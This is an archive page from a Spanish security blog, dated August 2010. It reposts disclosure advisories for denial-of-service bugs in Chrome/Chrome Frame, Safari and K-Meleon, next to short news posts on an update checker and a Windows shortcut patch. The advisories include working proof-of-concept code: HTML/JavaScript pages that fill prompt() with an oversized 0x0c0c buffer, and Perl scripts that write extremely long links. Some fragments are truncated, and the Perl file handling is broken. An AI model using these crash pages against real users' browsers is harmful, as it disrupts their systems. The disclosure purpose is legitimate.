Archivo de agosto 2010

Google Chrome and Chrome frame Prompt DoS

###############################################
Google Chrome and Chrome frame Prompt DoS
Afectado: http://www.google.com
Reportado por: http://lostmon.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Reporte en español: http://rootdev.blogspot.com/2010/08/google-chrome-and-chrome-frame-prompt.html
Notificación al afectado: Exploit disponible:
###############################################

Este bug ha sido descubierto por mí y ha sido testeado e investigado por cLimbo de #Ayuda-informaticos de la red iRC-Hispano (podéis encontrarnos allí)

#########
Resumen
#########

Algunas veces la necesidad de aplicaciones web en el sistema exponen algunos datos de los usuarios, se pueden vulnerar a través de un código Javascript, o por medio de formularios html, etcétera..

En el caso del código en Javascript pide accecer a los datos del sistema (la pregunta en sí es) es muy extenso ?

################

Google Chrome es propenso a una vulnerabilidad de denegación de servicio a través de «mensajes de alerta» cuando los datos esperados son muy extensos.

No sé si esto puede ser a su vez en una ejecución remota de código o una corrupción de la memoria o similares, pero creo que esta vulnerabilidad necesita analizarse y posteriormente parchearse.

###################
Versiones testeadas
###################

En todos los casos de Google Chrome es el vector el que produce alguna incongruencia en todos los sistemas 🙂

######################
MAC OS X leopard 10.5
######################

Google Chrome5.0.375.126 (Build oficial 53802) WebKit 533.4
V8 2.1.10.15
User Agent Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8; en-US)
AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4
Command Line /Applications/Google Chrome.app/Contents/MacOS/Google Chrome -psn_0_794818

In all cases OS X closes all Chrome Windows.( Chrome Crash)

##############
ubuntu 10.04
##############
Chromium 5.0.375.99 (Developer Build 51029) Ubuntu 10.04
WebKit 533.4
V8 2.1.10.14
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/533.4
(KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4
Command Line /usr/lib/chromium-browser/chromium-browser

In al cases Chrome is minimized and denies the access to
«window manager button» and we can´t no change beetwen applications
that we have open.

##################
Windows 7 32 bits
###################

Google Chrome 5.0.375.86 (Build oficial 49890)
on windows 7 ultimate fully patched.

It causes a DoS in chrome and a DoS in IE8 when
exploit it across Google Chrome Frame.

###############
Debian 2.6.26
###############

Google Chrome 6.0.472.25 (Build oficial 55113) devWebKit 534.3
V82.2.24.11
User Agent Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit 534.3

in all cases Debian Closes all chrome Windows.( Chrome Crash)

####################
PoC
####################

Este PoC ha sido testeado en win7 32 bits, chrome and chrome frame en conjunto con IE8 causando una denegación de servicio en IE8.

#############################

<meta http-equiv=»X-UA-Compatible» content=»chrome=1″>
<h1> wait 10 or 11 seconds :)</h1>
<script>

function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 38000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>
// <![CDATA[
function do_buffer(payload, len) {
while(payload.length

################# EOF ###################

Este segundo PoC es para ser testeado en Linux o en Mac OS X

#######################################
<h1> wait 10 or 11 seconds :)</h1>
<script>
function do_buffer(payload, len) {
while(payload.length < (len * 2)) payload += payload;
payload = payload.substring(0, len);
return payload;
}
function DoS()
{
var buffer = do_buffer(unescape(‘%u0c0c%u0c0c’), 50000);
prompt(buffer);
}
setTimeout(‘DoS()’,1000);
</script>

################# EOF ###################

// <![CDATA[
function do_buffer(payload, len) {
while(payload.length ############
Referencias
############
Vuln relacionada:
http://lostmon.blogspot.com/2010/07/ie8-on-windows-7-32-bits-unspecified.html

Google chrome bugtrack:
http://code.google.com/p/chromium/issues/detail?id=47617

################### €nd ###################

Thnx To cLimbo for his patience and support.

atentamente:
Lostmon (lostmon@gmail.com)
————

thz Lost 😉

Actualiza tu sistema con Update Checker

Y como el fin de semana puede ser muy largo (o muy corto, depende de cada uno) quizá alguno piense en utilizar un par de huecos entre playa y paseo para poder actualizar su sistema. La tarea siempre se hace larga cuando tenemos que revisar todos los programas instalados pero Update Checker puede hacer ésta pesadez por ti.

Update Checker es un programa muy sencillo creada por el portal de descargas FileHippo que nos comprobará todos y cada uno de los programas instalados en el ordenador y, utilizando su base de datos, nos alertará de cuales tenemos obsoletos y un enlace para su descarga desde la página de descargas.

Por supuesto no están soportados todos los programas existentes aunque sí la mayoría de los más conocidos y utilizados. Sólo tenemos que darnos una vuelta por FileHippo para darnos cuenta de que sus bases de datos son lo suficientemente amplias para dar cobertura a la inmensa cantidad de usuarios medios.

La descarga es extremadamente ligera (100kb) así que no tardéis en pasarle este scanner a vuestros PC’s y tenerlos siempre lo más frescos posible.

Seguir leyendo ‘Actualiza tu sistema con Update Checker’

Safari for windows Long link DoS

############################################
Safari for windows Long link DoS
URL del creador: http://www.apple.com/safari/
Reportado por: http://lostmon.blogspot.com/2010/08/safari-for-windows-long-link-dos.html
Creador notificado: SÍ exploit disponible: SÍ
############################################

Safari es vulnerable a tareas con un enlace muy largo. Este problema es explotable por medio de enlaces web, como <a href=»very long URL»>click here</a> o vectores similares. Safari no ejecuta el enlace y congelada a su vez el navegador, acabando en una condición de denegación de servicio (DoS).

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

windows 7 Ultimate:

Safari 5.0.X vulnerable
Safari 4.xx vulnerable

############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

####################
PoC
####################

#######################################################################
#!/usr/bin/perl
# safari & k-meleon Long «a href» Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# Safari 5.0.1 ( 7533,17,8) and prior versions Long link DoS
# generate the file open it with safari wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print «Usage: $0 <archivo.html>\n»;

}

$cabecera = «<html>» . «\n»;
$payload = «<a href=\»about:neterror?e=connectionFailure&c=» . «/» x 1028135 . «\»>click here if you can :)</a>» . «\n»;
$fin = «</html>»;

$datos = $cabecera . $payload . $fin;

open(FILE, ‘<‘ . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Links Relacionados
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Caso de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
——————
thz Lost 😉

K-Meleon for windows about:neterror Stack Overflow DoS

############################################
K-Meleon for windows about:neterror Stack Overflow DoS
URL creador: http://kmeleon.sourceforge.net/
Reportado por: http://lostmon.blogspot.com/2010/08/k-meleon-for-windows-aboutneterror-dos.html
Notificación al creador: SÍ Exploit disponible: SÍ
############################################

K-Meleon es un navegador web muy rápido, personalizable y ligero, basado en el motor de renderizado Gecko desarrollado por Mozilla, que es también usado por Firefox. K-Meleon es libre, es software de código abierto distribuido bajo la GNU General Public License y está diseñado específicamente para el OS Microsoft Windows (Win32).

K-Meleon es propenso a algunas vulnerabilidades, entre ellas: a colgarse con una URL muy larga, como about:neterror no limita la cantidad de caracteres que el usuario ponga en los parámetros ‘c’ ‘d’ si creamos una url malformada del navegador puede explotarse muy fácil. Esto es explotable a través de enlaces web, como por ejemplo; «haz clic aquí» o mediante window.location.replace url (‘muy largo’) o vectores similares.

#################
Versiones probadas
#################

He probado la vuln en un windows xp sp3 y en un windows 7 parcheado.

Win XP sp3:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes )
K-Meleon 1.6.0a4 Vulnerables.(crashes)

windows 7 Ultimate:
K-meleon 1.5.3 & 1.5.4 Vulnerables.(crashes)
K-Meleon 1.6.0a4 Vulnerables.(crashes)

############
Referencias
############

Descubierto: 29-07-2010
Notificación al creador: 31-07-2010
Respuesta del creador:
Parche del creador:

########################
ASM code stack overflow
########################

################
# PoC
################

#######################################################################
#!/usr/bin/perl
# k-meleon Long «a href» Link DoS
# Author: Lostmon Lords Lostmon@gmail.com http://lostmon.blogspot.com
# k-Meleon versions 1.5.3 & 1.5.4 internal page about:neterror DoS
# generate the file open it with k-keleon click in the link and wait a seconds
######################################################################

$archivo = $ARGV[0];
if(!defined($archivo))
{

print «Usage: $0 <archivo.html>\n»;

}

$cabecera = «<html>» . «\n»;
$payload = «<a href=\»about:neterror?e=connectionFailure&c=» . «/» x 1028135 . «\»>click here if you can :)</a>» . «\n»;
$fin = «</html>»;

$datos = $cabecera . $payload . $fin;

open(FILE, ‘<‘ . $archivo);
print FILE $datos;
close(FILE);

exit;

################## EOF ######################

##############
Related Links
##############

Bugtracker del creador: http://kmeleon.sourceforge.net/bugs/viewbug.php?bugid=1251
Vuln relacionada: https://bugzilla.mozilla.org/show_bug.cgi?id=583474
Casos de prueba: https://bugzilla.mozilla.org/attachment.cgi?id=461776

###################### €nd #############################

Thnx to Phreak for support and let me undestanding the nature of this bug
thnx to jajoni for test it in windows 7 X64 bits version.

atentamente:
Lostmon (lostmon@gmail.com)
————-
thz Lost 😉

Microsoft publica parche para grave vulnerabilidad

La semana pasada posteé sobre una vulnerabilidad en la forma de mostrar los iconos de accesos directos en Windows, que permite la ejecución de código malicioso con sólo abrir una carpeta o un sitio web preparado para ello, e incluso ustedes nos informaron sobre la aparición de algunos casos. Como esto fue aprovechado por diversas familias de virus, Microsoft decidió adelantar la publicación del parche al día de hoy, para disminuir los riesgos de infección.

Esta actualización llega fuera del ciclo habitual, cuya próxima tanda estaba prevista para el martes 10 de agosto, porque la compañía detectó un aumento importante en los intentos de ataque y su expansión a nuevas zonas geográficas. La información proviene de productos como Microsoft Secutiry Essentials que, al igual que las soluciones de otros fabricantes, ya dispone de firmas actualizadas.

Las correcciones son distribuidas a través de la página Windows Update y las actualizaciones automáticas. Como esto afecta a gran parte de las versiones del sistema operativo, incluyendo varias que ya no cuentan con soporte (anteriores a XP SP3), es probable que la mayoría de los usuarios deba instalarlas.

Si aplicaron la solución provisoria Fix It, que impide mostrar las imágenes que representan a cada atajo, podrán quitarla luego del proceso y recuperar la funcionalidad habitual.

Seguir leyendo ‘Microsoft publica parche para grave vulnerabilidad’


Blog Stats

  • 620.807 visitas

RSS

Feed
agosto 2010
L M X J V S D
 1
2345678
9101112131415
16171819202122
23242526272829
3031  

Usuarios online:

counter

Otras URL’s

TiraEcol

Tira Ecol
BlogESfera Directorio de Blogs Hispanos - Agrega tu Blog
Google PageRank 
		Checker